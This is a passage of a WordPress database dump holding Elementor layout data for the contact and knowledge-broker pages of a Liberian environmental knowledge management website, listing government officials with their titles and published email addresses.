lType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23179,3355,'_wp_attached_file','2021/01/yokie.png'),(23180,3355,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:17:\"2021/01/yokie.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"yokie-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"yokie-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23181,3356,'_elementor_edit_mode','builder'),(23182,3356,'_elementor_template_type','wp-page'),(23183,3356,'_elementor_version','3.0.16'),(23184,3356,'_wp_page_template','default'),(23185,3356,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br 